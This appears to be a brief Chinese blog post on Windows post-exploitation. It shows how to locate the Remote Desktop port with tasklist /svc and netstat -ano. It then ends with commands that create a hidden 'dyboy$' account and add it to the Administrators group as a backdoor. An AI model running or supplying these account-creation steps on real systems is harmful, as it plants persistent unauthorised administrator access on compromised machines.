Windows查看远程桌面端口/提权

在我们后期提权的过程中,成功添加账号密码

tasklist /svc

在输出的内容中查找 svchost.exe 进程下 termservice 服务对应的 PID

netstat  -ano

即可找到 PID 对应的开放端口,即远程桌面开放端口

然后就是一顿提权猛如虎

net user dyboy$ admin123456 /add
net localgroup Administrators dyboy$ /add
发表评论 / Comment

用心评论~